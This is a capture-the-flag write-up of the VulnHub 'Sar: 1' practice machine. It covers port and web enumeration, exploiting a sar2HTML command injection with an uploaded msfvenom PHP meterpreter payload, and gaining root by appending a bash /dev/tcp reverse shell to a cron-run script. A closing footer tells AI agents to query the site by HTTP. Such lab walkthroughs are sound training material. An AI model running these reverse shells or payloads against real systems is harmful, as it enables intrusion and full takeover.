# Sar: 1

This real life like VM from [**vulnhub.com**](https://www.vulnhub.com/entry/sar-1,425/) is a good practice for OSCP. I have found the Privilege escalation part most challenging. But this is a good practice VM and I hope this write-up will help readers.

![](/files/-M_-cc0JKXw09tx_4YYk)

### Enumeration:

1\) Host discovery: **`netdiscover -i eth0 -r 10.0.0.0/16`** (Found IP: 10.0.2.46)

2\) nmap all port scan: **`nmap -p- -Pn -v -T5 10.0.2.46`**

```
PORT   STATE SERVICE
80/tcp open  http
```

3\) All port scan using masscan:  **`masscan -p1-65535 10.0.2.46 --rate=1000 -e eth0`**

* **`-p1-65535,U:1-65535`** tells masscan to scan all TCP/UDP ports
* **`--rate=1000`** scan rate = 1000 packets per second
* **`-e eth0`** tells masscan to listen on the network interface for responses

This is also showing 1 port open.

4\) Enumeration tool shows nothing: **`enum4linux -v -a 10.0.2.46`**

5\) Default Ubuntu page showing in port 80:&#x20;

![](/files/-M_-QRPghIiDiPSSWcaR)

6\) For website directory listing: (but found nothing interesting)

**gobuster dir -u** [**http://10.0.2.46/**](http://10.0.2.46/) **-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt**

```
===============================================================
/server-status        (Status: 403) [Size: 274]
```

7\) Nikto scan: **`nikto -h http://10.0.2.46`**  (Here it shows some interesting info)

```
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
```

8\) /phpinfo.php shows:

![](/files/-M_-_0Zs42qVxBp9O5mc)

9\) /robots.txt

![](/files/-M_-_WigXl6I8JYWo3co)

10\) There is a report upload option in this /sar2HTML page:

![](/files/-M_-as17aWzHrlpzGhat)

11\) Found an exploit for Sar2HTML: [exploit-db](https://www.exploit-db.com/exploits/47204). This says, I can run command in the url.

![](/files/-M_0EagOkXOsqxtBNmpr)

### Exploitation:

12\) As command is executed via URL, so I can execute a reverse shell. I have created shell from [reveshells](https://www.revshells.com/) and tried to execute but failed.

13\) Creating payload using msfvenom and upload it:&#x20;

**`msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.2.42 lport=9999 f raw >sar.php`**

14\) From previous **;ls** command, I found that there is /uPLOAD directory. So to execute shell, I need to visit **/sar2HTML/sarDATA/uPLOAD/sar.php**&#x20;

15\) Metasploit handler:

```
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.2.42
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run
```

Visiting the sar.php file will give a reverse connection.

16\) After searching a while I have found user.txt. locate/find command do not work here.

![](/files/-M_-pyb3xEz6AUq1OuNq)

### Privilege escalation:

17\) In the meterpreter session, I can not execute python shell, so I have to run 'shell' first then :**`python3 -c 'import pty;pty.spawn("/bin/bash")'`**

18\) Using [LinEnum](https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/) to automate the enumeration. Some good place to download and run LinEnum is

* /tmp
* /dev/shm
* /var/lock
* /run/lock

This shows a huge report but not so useful.

19\) Found cron jobs: **`cat /etc/crontab`**

```
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
```

20\) Inside the *finally.sh* - its running *write.sh* and I can edit the **write.sh** so I have added a reverse shell there:&#x20;

**`echo "/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.42/4444 0>&1' " >> write.sh`**

after waiting for 5 minute, I have got a root shell from my another netcat listener. Changing to root directory and I found the root.txt

![](/files/-M_0CTW3VGduJgAGFy2m)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://meowsec.gitbook.io/vulnhub/easy-1/list1/sar.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.